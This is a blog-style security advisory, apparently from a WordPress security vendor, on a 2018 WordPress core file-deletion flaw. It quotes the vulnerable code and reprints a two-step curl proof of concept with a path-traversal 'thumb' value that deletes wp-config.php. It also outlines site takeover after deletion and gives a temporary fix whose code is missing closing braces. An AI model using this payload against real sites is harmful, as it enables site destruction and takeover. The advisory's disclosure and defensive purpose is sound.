WordPress Arbitrary File Deletion Vulnerability Exploit ? FIXED

 WordPress Arbitrary File Deletion Vulnerability Exploit

WordPress Arbitrary File Deletion Vulnerability

Table Of Contents:

Who were affected?
How Can Hacker Exploit Arbitrary File Deletion Vulnerability In WordPress?
Why reveal it if it’s critical?
? Where Is The Vulnerability Found?
Arbitrary File Deletion Exploit Code
How To Fix WordPress Arbitrary File Deletion Vulnerability?

This wide adoption makes it an interesting target for cyber criminals. RIPS Team disclosed an Arbitrary File Deletion Flaw Present in WordPress Core at Jun. 26, 2018. Karim El Ouerghemmi from RipsTech disclosed a critical flaw in WordPress allowing any author, publisher or administrator to delete any file from an installation, in any folder, without any tools.

In less than 1 minute, a site can be destroyed. The flaw is known to the security team of WordPress for about 7 months but still, no fix has been released, so Karim revealed it.(see ref’s)

Who Were Affected?

The vulnerability was fixed in WordPress 4.9.7 version, ( Also See Latest WordPress Versions) released on July 5. In order to successfully exploit this issue, the attacker would need to gain access to edit and delete media files which can be achieved by taking over an Author account or by targeting sites that expose the media functionality through various plugins. Website which did not updated their WordPress versions and were still running on outdated versions with specific media plugins installed, were mostly affected by this exploit.

How Can Hacker Exploit Arbitrary File Deletion Vulnerability In WordPress?

Unfortunately yes, in less than 1 minute an author can remove any file from the site as  wp-config.php. But also an attacker could delete the main file of a security extension so that it does not load anymore to then make more serious hacking actions. Because let’s say it, breaking a site can only be of interest for a hacker to steal the data.

 Vulnerability that can delete arbitrary file wordpress

Attackers can leverage the way the WordPress installation mechanism works, to gain arbitrary code execution by.

  • Deleting the wp-config.php file -An attacker could delete this file, undergo the installation process with credentials of his choice for the administrator account and, finally, execute arbitrary code on the server.
  • Allowing to reconfigure the site
  • Take over the admin account.
  • Disable some security restrictions through the deletion of .htaccess files – in some occasions, the .htaccess file contains security related constraints (e.g., access constraints to some folders). Deleting this file would deactivate those security constraints.
  • Disable some security restrictions through the deletion of index.php files that prevent directory listing. – Deleting those files would grant an attacker a listing of all files in directories protected by this measure.

You may have already watched videos of this exploit, using the JavaScript console to inject a hexadecimal code to add and call a new JS function and launch a new AJX call etc., IT’S WELL TOO, just change 2 values​​+ a last one that will be the path to the file to delete, that’s all.


Why reveal it if it’s critical?

The answer is in the question: because it’s crucial and if a security consultant can find it, a hacker too can. We (me, you) need to inform everyone about this vulnerability to show everyone that it’s easy to hack a WordPress site if you have an author/publisher/admin (other than you) on your site.

Where Is The Vulnerability Found?

An attacker could exploit the file deletion vulnerability to delete any file of the WordPress installation, as well as any other file on the server on which the PHP process user has the proper permissions to delete.

An arbitrary file deletion flaw occurs when it is possible to pass unsanitized input to a file deletion function.

In PHP an arbitrary file deletion occurs when the unlink() function is called and user input can affect parts of or the whole parameter $filename, which is the path of the file to delete, without undergoing proper sanitization.

The flaw resides in the WordPress Core, the code to trigger it was found in the wp-includes/post.php file:

 WordPress Arbitrary File Deletion Vulnerability Patch 4_9_7

The function wp_delete_attachment() is guilty here: 

function wp_delete_attachment( $post_id, $force_delete = false ) {
    $meta = wp_get_attachment_metadata( $post_id );
    if ( ! empty($meta['thumb']) ) {
        // Don't delete the thumb if another attachment uses it.
        if (! $wpdb->get_row( $wpdb->prepare( "SELECT meta_id FROM $wpdb->postmeta WHERE meta_key = '_wp_attachment_metadata' AND meta_value LIKE %s AND post_id <> %d", '%' . $wpdb->esc_like( $meta['thumb'] ) . '%', $post_id)) ) {
            $thumbfile = str_replace(basename($file), $meta['thumb'], $file);
            /** This filter is documented in wp-includes/functions.php */
            $thumbfile = apply_filters( 'wp_delete_file', $thumbfile );
            @ unlink( path_join($uploadpath['basedir'], $thumbfile) );


The call to unlink () delete the file contained in the named metadata thumb. But how is this given?

Let’s see it in  /wp-admin/post.php :

switch($action) {

    case 'editattachment':
        check_admin_referer('update-post_' . $post_id);
        // Update the thumbnail filename
        $newmeta = wp_get_attachment_metadata( $post_id, true );
        $newmeta['thumb'] = $_POST['thumb'];
        wp_update_attachment_metadata( $post_id, $newmeta );

The metadata is just the raw value of the user’s form field, no disinfection, no filter, no escape, nothing.  

WordPress <= 4.9.6 Arbitrary File Deletion Vulnerability

WordPress 4.9.6 Arbitrary File Deletion Vulnerability

# Date: 2018-06-27

# Exploit Author: VulnSpy

# Vendor Homepage: http://www.wordpress.org

# Software Link: http://www.wordpress.org/download

# Version: <= 4.9.6

# Tested on: php7 mysql5

# CVE :

Step 1:


curl -v 'http://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php'


Step 2:


curl -v 'http://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***'



How To Fix WordPress Arbitrary File Deletion Vulnerability?

The described arbitrary file deletion vulnerability in the WordPress remains unpatched in the WordPress core as the time of writing. Because of this, team at RIPS have developed a temporary fix provided in the snipped below. To integrate this fix into an existing WordPress installation, add it to the functions.php file of the currently active theme/child-theme.

You can use the following Karim patch (with a different function name to avoid code conflicts):

add_filter( 'wp_update_attachment_metadata', 'rips_unlink_tempfix' );

function rips_unlink_tempfix( $data ) {
    if( isset($data['thumb']) ) {
        $data['thumb'] = basename($data['thumb']);

    return $data;

What This Fix Does?

It hooks into the wp_update_attachement_metadata() call and makes sure that the data provided for the meta-value thumb does not contain any parts making path traversal possible. Thus, no security relevant files can be deleted.


WP Hacked Help For Securing Your Site

WP hacked help is by far one of the best security scanner in the WordPress community. We protect your site against multiple attacks such as: brute force attacks, DDoS attacks, SQL injections, etc.

WP hacked help also has a firewall that analyses all visitor traffic just before it reaches your website. Hackers are blocked before they reach and hack your website.

It also has a malware scanner to scan the WordPress, themes and plugins of your WordPress site, including to detect the presence of malware.

If you are looking for a reliable and affordable way to scan and secure your WordPress website then feel free to reach us.

Related Posts:

24/7 WP Security & Malware Removal
Is your site hacked or infected with malware? Let us get it fixed for you
Secure My Website(s)